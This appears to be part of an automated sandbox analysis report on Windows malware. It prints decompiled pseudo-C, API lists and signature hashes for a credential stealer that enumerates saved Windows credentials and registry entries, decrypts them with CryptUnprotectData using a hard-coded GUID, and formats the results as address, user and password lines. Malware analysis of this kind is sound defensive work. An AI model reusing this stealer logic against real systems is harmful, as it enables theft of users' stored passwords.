                                    • RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,?,?,?), ref: 00408F37
                                    • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 00408F89
                                    • RegEnumValueA.ADVAPI32(?,?,00000000,00000400,00000000,00000000,00000000,00000000,80000001,?,00000000,00000001,?,00000000,004092A7), ref: 0040900D
                                    • RegCloseKey.ADVAPI32(?,80000001,?,00000000,00000001,?,00000000,004092A7,?,?,?,?,00000000,00000000), ref: 00409021
                                      • Part of subcall function 00408AF8: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B36
                                      • Part of subcall function 00408AF8: CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B4C
                                      • Part of subcall function 00408AF8: CryptHashData.ADVAPI32(?,?,00000001,00000000,?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B76
                                      • Part of subcall function 00408AF8: CryptGetHashParam.ADVAPI32(?,00000002,?,00000014,00000000), ref: 00408BB2
                                      • Part of subcall function 00408AF8: CryptDestroyHash.ADVAPI32(?,?,00000002,?,00000014,00000000), ref: 00408BC3
                                      • Part of subcall function 00408AF8: CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000002,?,00000014,00000000), ref: 00408BCE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Hash$Value$ContextDataQuery$AcquireCloseCreateDestroyEnumOpenParamReleaseUnprotect
                                    • String ID: Address$Address: $J
                                    • API String ID: 1010751750-89420950
                                    • Opcode ID: 7efb64ff1d09feb6c5cb58f5f9c5601f3d714a3b7ee7f36232088a820c5129bc
                                    • Instruction ID: a1307f370dcfab90242bbc2907a83997e987d907be1ae94acc32d6e323161374
                                    • Opcode Fuzzy Hash: 7efb64ff1d09feb6c5cb58f5f9c5601f3d714a3b7ee7f36232088a820c5129bc
                                    • Instruction Fuzzy Hash: CBC1D135A00109ABDB01EBD5C981ADEB7B9EF48304F20447BF500F73D6DA79AE468B59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040930B, Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 226encryptionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 51%
                                    			E0040930B(void* __eax, intOrPtr __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char* _v32;
				char _v36;
				char _v40;
				char _v114;
				intOrPtr _v117;
				void _v151;
				char _v156;
				intOrPtr _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				intOrPtr _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				void* _t81;
				void* _t86;
				intOrPtr _t121;
				void* _t160;
				void* _t175;
				void* _t187;
				void* _t189;
				short* _t191;
				intOrPtr _t198;
				intOrPtr _t203;
				void* _t226;
				void* _t233;
				signed int _t234;
				void* _t236;
				intOrPtr* _t238;
				intOrPtr _t240;
				intOrPtr _t241;

				_t174 = __ebx;
				_v117 = _v117 + __edx;
				_t240 = _t241;
				_t175 = 0x1b;
				do {
					_push(0);
					_push(0);
					_t175 = _t175 - 1;
				} while (_t175 != 0);
				_push(_t175);
				_push(__ebx);
				_t236 = __eax;
				_push(_t240);
				_push(0x409651);
				_push( *[fs:eax]);
				 *[fs:eax] = _t241;
				E00401AC0(__eax);
				memcpy( &_v151, "abe2869f-9b47-4cd9-a358-c22904dba7f7", 9 << 2);
				asm("movsb");
				_t238 = _t236;
				_t233 = 0x25;
				_t81 =  &_v151;
				_t191 =  &_v114;
				do {
					 *_t191 = 0 << 2;
					_t191 = _t191 + 2;
					_t81 = _t81 + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				_v32 =  &_v114;
				_v36 = 0x4a;
				_push( &_v8);
				_push( &_v12);
				_push(0);
				_push(0);
				L004086E8();
				_t86 = _v12 - 1;
				if(_t86 >= 0) {
					_v40 = _t86 + 1;
					_t234 = 0;
					do {
						_t121 =  *((intOrPtr*)(_v8 + _t234 * 4));
						_v16 =  *((intOrPtr*)(_t121 + 0x1c));
						_v20 =  *((intOrPtr*)(_t121 + 0x18));
						_push( &_v28);
						_push(0);
						_push(0);
						_push(0);
						_push( &_v36);
						_push(0);
						_push( &_v20);
						L004086F0();
						_push( *_t238);
						_push("Address: ");
						E00401CAC( &_v156,  *((intOrPtr*)( *((intOrPtr*)(_v8 + _t234 * 4)) + 8)));
						_push(_v156);
						_push(0x4096a4);
						E00401E10();
						E00401174(_v28);
						_t174 = _v24;
						E00401D9C( &_v168, "User: ",  *_t238);
						E00402254( &_v164, _v168);
						_push(_v164);
						_push( &_v172);
						E00402218( &_v176, _v24);
						_push(E00402398(0x4096bc, _v176) - 1);
						E00402218( &_v180, _v24);
						_pop(_t187);
						E0040234C(_v180, _t187, 0, 0);
						_push(_v172);
						_push(0x4096c4);
						E00402280();
						E00401D3C(_t238, _v160);
						E00401D9C( &_v192, "Password: ",  *_t238);
						E00402254( &_v188, _v192);
						_push(_v188);
						_push( &_v196);
						E00402218( &_v200, _v24);
						_push(E00402398(0x4096bc, _v200));
						E00402218( &_v204, _v24);
						_t160 = E00402274(_v204);
						_push(_t160 - _t222);
						E00402218( &_v208, _t174);
						_push(E00402398(0x4096bc, _v208) + 1);
						E00402218( &_v212, _t174);
						_pop(_t226);
						_pop(_t189);
						E0040234C(_v212, _t189, _t226, 0);
						_push(_v196);
						_push(0x4096c4);
						_push(0x4096e4);
						E00402280();
						E00401D3C(_t238, _v184);
						_t234 = _t234 + 1;
						_t60 =  &_v40;
						 *_t60 = _v40 - 1;
						_t249 =  *_t60;
					} while ( *_t60 != 0);
				}
				E0040592C("Address: ", _t174,  *_t238, 0, _t238, _t249,  &_v216);
				E00401B14(_t238, _v216);
				E0040592C("User: ", _t174,  *_t238, 0, _t238, _t249,  &_v220);
				E00401B14(_t238, _v220);
				E0040592C("Password: ", _t174,  *_t238, 0, _t238, _t249,  &_v224);
				E00401B14(_t238, _v224);
				_pop(_t198);
				 *[fs:eax] = _t198;
				_push(E00409658);
				E00401AE4( &_v224, 3);
				E00402120( &_v212, 5);
				E00401AC0( &_v192);
				E00402120( &_v188, 5);
				E00401AC0( &_v168);
				E00402120( &_v164, 2);
				E00401AC0( &_v156);
				_t203 =  *0x4086bc; // 0x4086c0
				return E00402FC8( &_v8, _t203);
			}


















































                                    0x0040930b
                                    0x0040930b
                                    0x0040930d
                                    0x0040930f
                                    0x00409314
                                    0x00409314
                                    0x00409316
                                    0x00409318
                                    0x00409318
                                    0x0040931b
                                    0x0040931c
                                    0x0040931f
                                    0x00409323
                                    0x00409324
                                    0x00409329
                                    0x0040932c
                                    0x00409331
                                    0x00409347
                                    0x00409349
                                    0x0040934a
                                    0x0040934b
                                    0x00409350
                                    0x00409356
                                    0x00409359
                                    0x00409360
                                    0x00409363
                                    0x00409366
                                    0x00409367
                                    0x00409367
                                    0x0040936d
                                    0x00409370
                                    0x0040937a
                                    0x0040937e
                                    0x0040937f
                                    0x00409381
                                    0x00409383
                                    0x0040938b
                                    0x0040938e
                                    0x00409395
                                    0x00409398
                                    0x0040939a
                                    0x0040939d
                                    0x004093a3
                                    0x004093a9
                                    0x004093af
                                    0x004093b0
                                    0x004093b2
                                    0x004093b4
                                    0x004093b9
                                    0x004093ba
                                    0x004093bf
                                    0x004093c0
                                    0x004093c5
                                    0x004093c7
                                    0x004093db
                                    0x004093e0
                                    0x004093e6
                                    0x004093f2
                                    0x004093fa
                                    0x004093ff
                                    0x0040940f
                                    0x00409420
                                    0x00409425
                                    0x00409431
                                    0x0040943a
                                    0x00409450
                                    0x00409459
                                    0x00409466
                                    0x00409467
                                    0x0040946c
                                    0x00409472
                                    0x00409482
                                    0x0040948f
                                    0x004094a1
                                    0x004094b2
                                    0x004094b7
                                    0x004094c3
                                    0x004094cc
                                    0x004094e1
                                    0x004094ea
                                    0x004094f5
                                    0x004094fd
                                    0x00409506
                                    0x0040951c
                                    0x00409525
                                    0x00409530
                                    0x00409531
                                    0x00409532
                                    0x00409537
                                    0x0040953d
                                    0x00409542
                                    0x00409552
                                    0x0040955f
                                    0x00409564
                                    0x00409565
                                    0x00409565
                                    0x00409565
                                    0x00409565
                                    0x0040939a
                                    0x0040957e
                                    0x0040958b
                                    0x004095a0
                                    0x004095ad
                                    0x004095c2
                                    0x004095cf
                                    0x004095d6
                                    0x004095d9
                                    0x004095dc
                                    0x004095ec
                                    0x004095fc
                                    0x00409607
                                    0x00409617
                                    0x00409622
                                    0x00409632
                                    0x0040963d
                                    0x00409645
                                    0x00409650

                                    APIs
                                    • CredEnumerateA.ADVAPI32(00000000,00000000,?,?,00000000,00409651,?,?,?,?,0000001A,00000000,00000000), ref: 00409383
                                    • CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000000,?), ref: 004093C0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CredCryptDataEnumerateUnprotect
                                    • String ID: Address: $J$Password: $User: $abe2869f-9b47-4cd9-a358-c22904dba7f7
                                    • API String ID: 347848744-1664342708
                                    • Opcode ID: 4a3879545c6f68b8761238015d078142ae55796dd998d212b916fac696537039
                                    • Instruction ID: a5b569f93a913c997ede62b459655b5d3c6f20ecc9ce9054b703515ecd65e6d0
                                    • Opcode Fuzzy Hash: 4a3879545c6f68b8761238015d078142ae55796dd998d212b916fac696537039
                                    • Instruction Fuzzy Hash: 12911134A001189BDB10EB65CD41F9EB3B9EF88304F5085FBA508B72D6DB789E458F69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040930C, Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 226encryptionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 51%
                                    			E0040930C(void* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char* _v32;
				char _v36;
				char _v40;
				char _v114;
				void _v151;
				char _v156;
				intOrPtr _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				intOrPtr _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				void* _t79;
				void* _t84;
				intOrPtr _t119;
				void* _t158;
				void* _t173;
				void* _t185;
				void* _t187;
				short* _t188;
				intOrPtr _t195;
				intOrPtr _t200;
				void* _t223;
				void* _t230;
				signed int _t231;
				void* _t233;
				intOrPtr* _t235;
				intOrPtr _t237;
				intOrPtr _t238;

				_t172 = __ebx;
				_t237 = _t238;
				_t173 = 0x1b;
				do {
					_push(0);
					_push(0);
					_t173 = _t173 - 1;
				} while (_t173 != 0);
				_push(_t173);
				_push(__ebx);
				_t233 = __eax;
				_push(_t237);
				_push(0x409651);
				_push( *[fs:eax]);
				 *[fs:eax] = _t238;
				E00401AC0(__eax);
				memcpy( &_v151, "abe2869f-9b47-4cd9-a358-c22904dba7f7", 9 << 2);
				asm("movsb");
				_t235 = _t233;
				_t230 = 0x25;
				_t79 =  &_v151;
				_t188 =  &_v114;
				do {
					 *_t188 = 0 << 2;
					_t188 = _t188 + 2;
					_t79 = _t79 + 1;
					_t230 = _t230 - 1;
				} while (_t230 != 0);
				_v32 =  &_v114;
				_v36 = 0x4a;
				_push( &_v8);
				_push( &_v12);
				_push(0);
				_push(0);
				L004086E8();
				_t84 = _v12 - 1;
				if(_t84 >= 0) {
					_v40 = _t84 + 1;
					_t231 = 0;
					do {
						_t119 =  *((intOrPtr*)(_v8 + _t231 * 4));
						_v16 =  *((intOrPtr*)(_t119 + 0x1c));
						_v20 =  *((intOrPtr*)(_t119 + 0x18));
						_push( &_v28);
						_push(0);
						_push(0);
						_push(0);
						_push( &_v36);
						_push(0);
						_push( &_v20);
						L004086F0();
						_push( *_t235);
						_push("Address: ");
						E00401CAC( &_v156,  *((intOrPtr*)( *((intOrPtr*)(_v8 + _t231 * 4)) + 8)));
						_push(_v156);
						_push(0x4096a4);
						E00401E10();
						E00401174(_v28);
						_t172 = _v24;
						E00401D9C( &_v168, "User: ",  *_t235);
						E00402254( &_v164, _v168);
						_push(_v164);
						_push( &_v172);
						E00402218( &_v176, _v24);
						_push(E00402398(0x4096bc, _v176) - 1);
						E00402218( &_v180, _v24);
						_pop(_t185);
						E0040234C(_v180, _t185, 0, 0);
						_push(_v172);
						_push(0x4096c4);
						E00402280();
						E00401D3C(_t235, _v160);
						E00401D9C( &_v192, "Password: ",  *_t235);
						E00402254( &_v188, _v192);
						_push(_v188);
						_push( &_v196);
						E00402218( &_v200, _v24);
						_push(E00402398(0x4096bc, _v200));
						E00402218( &_v204, _v24);
						_t158 = E00402274(_v204);
						_push(_t158 - _t219);
						E00402218( &_v208, _t172);
						_push(E00402398(0x4096bc, _v208) + 1);
						E00402218( &_v212, _t172);
						_pop(_t223);
						_pop(_t187);
						E0040234C(_v212, _t187, _t223, 0);
						_push(_v196);
						_push(0x4096c4);
						_push(0x4096e4);
						E00402280();
						E00401D3C(_t235, _v184);
						_t231 = _t231 + 1;
						_t58 =  &_v40;
						 *_t58 = _v40 - 1;
						_t245 =  *_t58;
					} while ( *_t58 != 0);
				}
				E0040592C("Address: ", _t172,  *_t235, 0, _t235, _t245,  &_v216);
				E00401B14(_t235, _v216);
				E0040592C("User: ", _t172,  *_t235, 0, _t235, _t245,  &_v220);
				E00401B14(_t235, _v220);
				E0040592C("Password: ", _t172,  *_t235, 0, _t235, _t245,  &_v224);
				E00401B14(_t235, _v224);
				_pop(_t195);
				 *[fs:eax] = _t195;
				_push(E00409658);
				E00401AE4( &_v224, 3);
				E00402120( &_v212, 5);
				E00401AC0( &_v192);
				E00402120( &_v188, 5);
				E00401AC0( &_v168);
				E00402120( &_v164, 2);
				E00401AC0( &_v156);
				_t200 =  *0x4086bc; // 0x4086c0
				return E00402FC8( &_v8, _t200);
			}

















































                                    0x0040930c
                                    0x0040930d
                                    0x0040930f
                                    0x00409314
                                    0x00409314
                                    0x00409316
                                    0x00409318
                                    0x00409318
                                    0x0040931b
                                    0x0040931c
                                    0x0040931f
                                    0x00409323
                                    0x00409324
                                    0x00409329
                                    0x0040932c
                                    0x00409331
                                    0x00409347
                                    0x00409349
                                    0x0040934a
                                    0x0040934b
                                    0x00409350
                                    0x00409356
                                    0x00409359
                                    0x00409360
                                    0x00409363
                                    0x00409366
                                    0x00409367
                                    0x00409367
                                    0x0040936d
                                    0x00409370
                                    0x0040937a
                                    0x0040937e
                                    0x0040937f
                                    0x00409381
                                    0x00409383
                                    0x0040938b
                                    0x0040938e
                                    0x00409395
                                    0x00409398
                                    0x0040939a
                                    0x0040939d
                                    0x004093a3
                                    0x004093a9
                                    0x004093af
                                    0x004093b0
                                    0x004093b2
                                    0x004093b4
                                    0x004093b9
                                    0x004093ba
                                    0x004093bf
                                    0x004093c0
                                    0x004093c5
                                    0x004093c7
                                    0x004093db
                                    0x004093e0
                                    0x004093e6
                                    0x004093f2
                                    0x004093fa
                                    0x004093ff
                                    0x0040940f
                                    0x00409420
                                    0x00409425
                                    0x00409431
                                    0x0040943a
                                    0x00409450
                                    0x00409459
                                    0x00409466
                                    0x00409467
                                    0x0040946c
                                    0x00409472
                                    0x00409482
                                    0x0040948f
                                    0x004094a1
                                    0x004094b2
                                    0x004094b7
                                    0x004094c3
                                    0x004094cc
                                    0x004094e1
                                    0x004094ea
                                    0x004094f5
                                    0x004094fd
                                    0x00409506
                                    0x0040951c
                                    0x00409525
                                    0x00409530
                                    0x00409531
                                    0x00409532
                                    0x00409537
                                    0x0040953d
                                    0x00409542
                                    0x00409552
                                    0x0040955f
                                    0x00409564
                                    0x00409565
                                    0x00409565
                                    0x00409565
                                    0x00409565
                                    0x0040939a
                                    0x0040957e
                                    0x0040958b
                                    0x004095a0
                                    0x004095ad
                                    0x004095c2
                                    0x004095cf
                                    0x004095d6
                                    0x004095d9
                                    0x004095dc
                                    0x004095ec
                                    0x004095fc
                                    0x00409607
                                    0x00409617
                                    0x00409622
                                    0x00409632
                                    0x0040963d
                                    0x00409645
                                    0x00409650

                                    APIs
                                    • CredEnumerateA.ADVAPI32(00000000,00000000,?,?,00000000,00409651,?,?,?,?,0000001A,00000000,00000000), ref: 00409383
                                    • CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000000,?), ref: 004093C0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CredCryptDataEnumerateUnprotect
                                    • String ID: Address: $J$Password: $User: $abe2869f-9b47-4cd9-a358-c22904dba7f7
                                    • API String ID: 347848744-1664342708
                                    • Opcode ID: a598dedb873e850efc99fa9ce02c242345e1ad2a0e5d827fa5438b311f1ce501
                                    • Instruction ID: f7aa1b8b451512ca1bfa8244105fd5df2e5d2c4bebb96dcb77b4513865450f7e
                                    • Opcode Fuzzy Hash: a598dedb873e850efc99fa9ce02c242345e1ad2a0e5d827fa5438b311f1ce501
                                    • Instruction Fuzzy Hash: 59912234A001189BDB10EB55CD41F9EB3B9EF88304F5085FBA508B72D6DB789E458F69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00408AD5, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 147encryptionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 57%
                                    			E00408AD5(signed int* __eax, void* __ebx, intOrPtr* __ecx, void* __edx, signed int __esi, char _a1, signed int _a73) {
				long* _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed char _t43;
				long* _t50;
				intOrPtr _t66;
				intOrPtr _t71;
				void* _t76;
				void* _t94;
				intOrPtr _t103;
				intOrPtr _t104;
				signed char _t112;
				void* _t113;
				signed int _t115;
				void* _t116;
				char* _t117;
				void* _t119;

				asm("adc [edx], eax");
				_t43 =  *__eax ^  *[cs:ecx];
				 *_t43 =  *_t43 + _t43;
				 *_t43 =  *_t43 + _t43;
				 *_t43 =  *_t43 + _t43;
				 *__ecx =  *__ecx + __edx;
				 *_t43 =  *_t43 + _t43;
				 *_t43 =  *_t43 + _t43;
				asm("adc [eax], al");
				_t115 = __esi | _a73;
				_t117 =  &_a1;
				asm("aaa");
				_pop(_t111);
				asm("arpl [gs:edi+0x64], bp");
				_push(_t117);
				_push(_t117);
				_push(_t115);
				_v44 = 0;
				_v32 = 0;
				_v28 = 0;
				_v16 = 0;
				_t116 = __edx;
				_t112 = _t43;
				_push(_t119);
				_push(0x408c74);
				_push( *[fs:eax]);
				 *[fs:eax] = _t119 + 0xffffffd8;
				_t94 = 0;
				E00401AC0(__edx);
				CryptAcquireContextA( &_v8, 0, 0, 1, 0);
				_push( &_v12);
				_push(0);
				_push(0);
				_push(0x8004);
				_t50 = _v8;
				_push(_t50);
				L00408978();
				if(_t50 != 0) {
					_push(0);
					E00402218( &_v28, _t112);
					_push(E00402274(_v28) + 1 + E00402274(_v28) + 1);
					_push(_t112);
					_t66 = _v12;
					_push(_t66);
					L00408980();
					if(_t66 != 0) {
						_v20 = 0x14;
						_push(0x14);
						E00402FBC();
						_push(0);
						_push( &_v20);
						_push(_v16);
						_push(2);
						_t71 = _v12;
						_push(_t71);
						L00408970();
						if(_t71 != 0) {
							_push(_v12);
							L00408988();
							CryptReleaseContext(_v8, 0);
							_t76 = _v20 - 1;
							if(_t76 >= 0) {
								_v24 = _t76 + 1;
								_t113 = 0;
								do {
									_t94 = _t94 +  *(_v16 + _t113);
									_v40 =  *(_v16 + _t113) & 0x000000ff;
									_v36 = 0;
									E004089C8(0x408c8c, _t94, 0,  &_v40, _t113, _t116,  &_v32);
									E00401D58(_t116, _v32);
									_t113 = _t113 + 1;
									_t30 =  &_v24;
									 *_t30 = _v24 - 1;
								} while ( *_t30 != 0);
							}
							_v40 = 0;
							_v36 = 0;
							E004089C8(0x408c8c, _t94, 0,  &_v40, _t112, _t116,  &_v44);
							E00401D58(_t116, _v44);
						}
					}
				}
				_pop(_t103);
				 *[fs:eax] = _t103;
				_push(E00408C7B);
				E00401AC0( &_v44);
				E00401AC0( &_v32);
				E00402108( &_v28);
				_t104 =  *0x408ad4; // 0x408ad8
				return E00402FC8( &_v16, _t104);
			}



























                                    0x00408ad8
                                    0x00408ada
                                    0x00408add
                                    0x00408adf
                                    0x00408ae1
                                    0x00408ae3
                                    0x00408ae5
                                    0x00408ae7
                                    0x00408ae9
                                    0x00408aec
                                    0x00408aef
                                    0x00408af0
                                    0x00408af1
                                    0x00408af2
                                    0x00408af7
                                    0x00408af8
                                    0x00408aff
                                    0x00408b03
                                    0x00408b06
                                    0x00408b09
                                    0x00408b0c
                                    0x00408b0f
                                    0x00408b11
                                    0x00408b15
                                    0x00408b16
                                    0x00408b1b
                                    0x00408b1e
                                    0x00408b21
                                    0x00408b25
                                    0x00408b36
                                    0x00408b3e
                                    0x00408b3f
                                    0x00408b41
                                    0x00408b43
                                    0x00408b48
                                    0x00408b4b
                                    0x00408b4c
                                    0x00408b53
                                    0x00408b59
                                    0x00408b60
                                    0x00408b70
                                    0x00408b71
                                    0x00408b72
                                    0x00408b75
                                    0x00408b76
                                    0x00408b7d
                                    0x00408b83
                                    0x00408b8a
                                    0x00408b9a
                                    0x00408ba2
                                    0x00408ba7
                                    0x00408bab
                                    0x00408bac
                                    0x00408bae
                                    0x00408bb1
                                    0x00408bb2
                                    0x00408bb9
                                    0x00408bc2
                                    0x00408bc3
                                    0x00408bce
                                    0x00408bd6
                                    0x00408bd9
                                    0x00408bdc
                                    0x00408bdf
                                    0x00408be1
                                    0x00408be4
                                    0x00408bf2
                                    0x00408bf5
                                    0x00408c03
                                    0x00408c0d
                                    0x00408c12
                                    0x00408c13
                                    0x00408c13
                                    0x00408c13
                                    0x00408be1
                                    0x00408c20
                                    0x00408c23
                                    0x00408c31
                                    0x00408c3b
                                    0x00408c3b
                                    0x00408bb9
                                    0x00408b7d
                                    0x00408c42
                                    0x00408c45
                                    0x00408c48
                                    0x00408c50
                                    0x00408c58
                                    0x00408c60
                                    0x00408c68
                                    0x00408c73

                                    APIs
                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B36
                                    • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B4C
                                    • CryptHashData.ADVAPI32(?,?,00000001,00000000,?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B76
                                    • CryptGetHashParam.ADVAPI32(?,00000002,?,00000014,00000000), ref: 00408BB2
                                    • CryptDestroyHash.ADVAPI32(?,?,00000002,?,00000014,00000000), ref: 00408BC3
                                    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000002,?,00000014,00000000), ref: 00408BCE
                                      • Part of subcall function 004089C8: wvsprintfA.USER32(?,00000000,?), ref: 00408A5E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleasewvsprintf
                                    • String ID: %2.2X
                                    • API String ID: 1237987328-791839006
                                    • Opcode ID: c67aecaa6e23e9d039a3e904eadb6ac2ef83ae983283d730df33f5abd18faf33
                                    • Instruction ID: d3845163c2b931c13764af6d44d3521470b732fafe65dfe0c77c1fbeb44f725f
                                    • Opcode Fuzzy Hash: c67aecaa6e23e9d039a3e904eadb6ac2ef83ae983283d730df33f5abd18faf33
                                    • Instruction Fuzzy Hash: 04513070A04249AFDB01EBA5C941BEEBBB8AF09304F5540BFF540F72D1DA7899058B69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00408AF8, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132encryptionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 61%
                                    			E00408AF8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				long* _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				signed int _v40;
				char _v44;
				long* _t47;
				intOrPtr _t63;
				intOrPtr _t68;
				void* _t73;
				void* _t91;
				intOrPtr _t99;
				intOrPtr _t100;
				void* _t108;
				void* _t109;
				void* _t111;
				void* _t114;

				_v44 = 0;
				_v32 = 0;
				_v28 = 0;
				_v16 = 0;
				_t111 = __edx;
				_t108 = __eax;
				_push(_t114);
				_push(0x408c74);
				_push( *[fs:eax]);
				 *[fs:eax] = _t114 + 0xffffffd8;
				_t91 = 0;
				E00401AC0(__edx);
				CryptAcquireContextA( &_v8, 0, 0, 1, 0);
				_push( &_v12);
				_push(0);
				_push(0);
				_push(0x8004);
				_t47 = _v8;
				_push(_t47);
				L00408978();
				if(_t47 != 0) {
					_push(0);
					E00402218( &_v28, _t108);
					_push(E00402274(_v28) + 1 + E00402274(_v28) + 1);
					_push(_t108);
					_t63 = _v12;
					_push(_t63);
					L00408980();
					if(_t63 != 0) {
						_v20 = 0x14;
						_push(0x14);
						E00402FBC();
						_push(0);
						_push( &_v20);
						_push(_v16);
						_push(2);
						_t68 = _v12;
						_push(_t68);
						L00408970();
						if(_t68 != 0) {
							_push(_v12);
							L00408988();
							CryptReleaseContext(_v8, 0);
							_t73 = _v20 - 1;
							if(_t73 >= 0) {
								_v24 = _t73 + 1;
								_t109 = 0;
								do {
									_t91 = _t91 +  *(_v16 + _t109);
									_v40 =  *(_v16 + _t109) & 0x000000ff;
									_v36 = 0;
									E004089C8(0x408c8c, _t91, 0,  &_v40, _t109, _t111,  &_v32);
									E00401D58(_t111, _v32);
									_t109 = _t109 + 1;
									_t29 =  &_v24;
									 *_t29 = _v24 - 1;
								} while ( *_t29 != 0);
							}
							_v40 = 0;
							_v36 = 0;
							E004089C8(0x408c8c, _t91, 0,  &_v40, _t108, _t111,  &_v44);
							E00401D58(_t111, _v44);
						}
					}
				}
				_pop(_t99);
				 *[fs:eax] = _t99;
				_push(E00408C7B);
				E00401AC0( &_v44);
				E00401AC0( &_v32);
				E00402108( &_v28);
				_t100 =  *0x408ad4; // 0x408ad8
				return E00402FC8( &_v16, _t100);
			}
























                                    0x00408b03
                                    0x00408b06
                                    0x00408b09
                                    0x00408b0c
                                    0x00408b0f
                                    0x00408b11
                                    0x00408b15
                                    0x00408b16
                                    0x00408b1b
                                    0x00408b1e
                                    0x00408b21
                                    0x00408b25
                                    0x00408b36
                                    0x00408b3e
                                    0x00408b3f
                                    0x00408b41
                                    0x00408b43
                                    0x00408b48
                                    0x00408b4b
                                    0x00408b4c
                                    0x00408b53
                                    0x00408b59
                                    0x00408b60
                                    0x00408b70
                                    0x00408b71
                                    0x00408b72
                                    0x00408b75
                                    0x00408b76
                                    0x00408b7d
                                    0x00408b83
                                    0x00408b8a
                                    0x00408b9a
                                    0x00408ba2
                                    0x00408ba7
                                    0x00408bab
                                    0x00408bac
                                    0x00408bae
                                    0x00408bb1
                                    0x00408bb2
                                    0x00408bb9
                                    0x00408bc2
                                    0x00408bc3
                                    0x00408bce
                                    0x00408bd6
                                    0x00408bd9
                                    0x00408bdc
                                    0x00408bdf
                                    0x00408be1
                                    0x00408be4
                                    0x00408bf2
                                    0x00408bf5
                                    0x00408c03
